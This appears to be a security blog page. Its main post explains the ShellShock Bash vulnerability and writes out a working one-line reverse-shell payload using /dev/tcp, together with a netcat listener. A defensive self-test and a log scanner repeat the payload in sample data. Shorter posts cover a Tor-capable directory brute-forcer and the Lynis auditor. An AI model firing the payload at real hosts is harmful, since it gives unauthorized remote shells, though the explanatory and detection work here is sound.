Exploiting ShellShock getting a reverse shell

A Bash vulnerability (aka ShellShock) was published two months ago (CVE-2014-6271, original release date 09/24/2014), reaching the highest score for Impact and Exploitability in NIST's NVD, with the following overview:

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka “ShellShock.” NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

The first patch released was partial and left a second vulnerability (CVE-2014-7169, original release date 09/24/2014), again with the top score for Impact and Exploitability in NIST's NVD, with the following overview (highlight is mine):

GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271

Two months later, ShellShock is still in the wild, used to exploit thousands of systems all around the net, installing php/perl/irc shells or any other malicious payload. This is possible because the original ShellShock vulnerability is now related to five other CVEs:

  • CVE-2014-6271 (Initial report)
  • CVE-2014-6277
  • CVE-2014-6278
  • CVE-2014-7169
  • CVE-2014-7186
  • CVE-2014-7187

The following image, taken from the F5 website, explains how ShellShock works and why it is so dangerous:


Basically, by exploiting this vulnerability you can run any command (or any sequence of commands), but in 90% of the cases I found, the final goal was installing a shell, usually in five steps:

  1. Exploiting the vulnerability
  2. Downloading a script (perl, bash, c, etc…) from a remote site via wget, curl, etc…
  3. Saving the script under /tmp
  4. Executing the script
  5. Cleaning up (removing the original file from /tmp)

In many cases this approach fails, because perl/php/c shells are detected and removed by the security safeguards protecting the system, and the remote sites can be blocked by web filtering policies. In recent days, however, I noticed a specific attack that does not use any malicious code, only a one-line Bash command:

() { ignored;};/bin/bash -i >& /dev/tcp/ip/port 0>&1

Let me explain better:

() { ignored;}; is the ShellShock trigger: a Bash function definition placed in an environment variable, followed by a trailing command that a vulnerable Bash executes when it imports the variable
/bin/bash -i starts an interactive Bash session
>& /dev/tcp/ip/port redirects standard output and standard error to the remote host over a TCP socket that Bash opens itself (e.g. /dev/tcp/1.2.3.4/8080 sends the session to IP 1.2.3.4 on TCP port 8080)
0>&1 attaches standard input to the same socket, so the remote end can type into the shell. Strictly this should be 0<&1, but it works in both cases, because Bash only duplicates the descriptor here and the direction symbol makes no difference

On the remote side a listener must be running: for testing I used nc -l 8080 (netcat listening on TCP port 8080).

This is a very interesting approach to exploiting ShellShock to get a reverse shell :)
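Two defender-side checks for what the post describes, as an added example that is not code from the original post: a local test of whether the installed bash still executes a command trailing the "() {" function body, and an awk scan that flags web-server log lines carrying that marker and pulls out the /dev/tcp target of the reverse-shell variant. The function names are mine, the log lines are constructed (combined log format, so User-Agent and Referer are on the line), and the addresses are RFC 5737 documentation ranges.

```shell
#!/usr/bin/env bash
# Added example, not code from the original post: two defender-side checks.

is_bash_vulnerable() {
    # Classic self-test. A vulnerable bash imports x as a function and then runs
    # the trailing "echo vulnerable"; a patched bash treats x as a plain variable.
    local out
    out=$(env x='() { :;}; echo vulnerable' bash -c ':' 2>/dev/null || true)
    [ "$out" = "vulnerable" ]
}

scan_shellshock_log() {
    # $1: web-server access log in combined format (User-Agent and Referer on
    # the line). Prints "<client ip> <reverse-shell target or ->" for every
    # line carrying the "() {" marker the post describes.
    awk '
        /[(][)][ ]*[{]/ {
            target = "-"
            if (match($0, /\/dev\/tcp\/[0-9.]+\/[0-9]+/)) {
                # strip the 9-character "/dev/tcp/" prefix, keep "ip/port"
                target = substr($0, RSTART + 9, RLENGTH - 9)
            }
            print $1, target
        }' "$1"
}

# Constructed sample log; the addresses are RFC 5737 documentation ranges.
SAMPLE_LOG=$(mktemp)
cat > "$SAMPLE_LOG" <<'EOF'
203.0.113.5 - - [24/Nov/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { ignored;};/bin/bash -i >& /dev/tcp/198.51.100.7/8080 0>&1"
198.51.100.20 - - [24/Nov/2014:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.9 - - [24/Nov/2014:10:02:11 +0000] "GET /cgi-bin/test.sh HTTP/1.1" 500 0 "() { :;}; echo vulnerable" "curl/7.38"
EOF

main() {
    if is_bash_vulnerable; then
        echo "bash: VULNERABLE to CVE-2014-6271"
    else
        echo "bash: not vulnerable to the CVE-2014-6271 test"
    fi
    scan_shellshock_log "$SAMPLE_LOG"
}
main
```

Point scan_shellshock_log at a real access log to list the source addresses of every ShellShock probe together with the callback host and port the reverse-shell variant tried to reach.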

FgScanner included in BlackArch Linux

FgScanner has been included in BlackArch Linux. What is BlackArch Linux?

“BlackArch Linux is a lightweight expansion to Arch Linux for penetration testers and security researchers.

The repository contains 1059 tools. You can install tools individually or in groups. BlackArch is compatible with existing Arch installs. For more information, see the installation instructions. Please note that although BlackArch is past the beta stage, it is still a relatively new project. To report bugs and request new tools, please visit the issue tracker on Github, stop by IRC, or email us.”


FGscanner is available for Download

Hi All!
I finally completed FGscanner  :)
FGscanner is a perl script useful for finding unindexed directories, hidden pages, and development or test folders on a web server. The script works in dictionary attack mode using two wordlist files (fg_dirs and fg_pages) and can be routed through a proxy or the Tor network if a tor daemon is running on your system.

The project is hosted on GitHub and you can download it here.

This is the initial release, and any comment, contribution or suggestion is more than welcome! :)


Check systems security with Lynis

How many times have you wondered about your systems' security? Using Linux or Mac is not enough! You must check and configure your systems to be as secure as possible. To do this we can use Lynis, a command-line utility that checks a system for malware, misconfigurations, integrity problems, etc…
Lynis is easy to install and is available for Debian-like and RedHat-like distros, FreeBSD and Mac OS X.

As well explained on the rootkit.nl website, “Lynis is an auditing tool for Unix (specialists). It scans the system and available software, to detect security issues. Besides security-related information it will also scan for general system information, installed packages and configuration mistakes.

This software aims at assisting automated auditing, software patch management, vulnerability and malware scanning of Unix-based systems. It can be run without prior installation, so inclusion on read-only storage is no problem (USB stick, cd/dvd).

Lynis assists auditors in performing Basel II, GLBA, HIPAA, PCI DSS and SOX (Sarbanes-Oxley) compliance audits.”

In this article I’ll show you how to install and run Lynis on your PC.
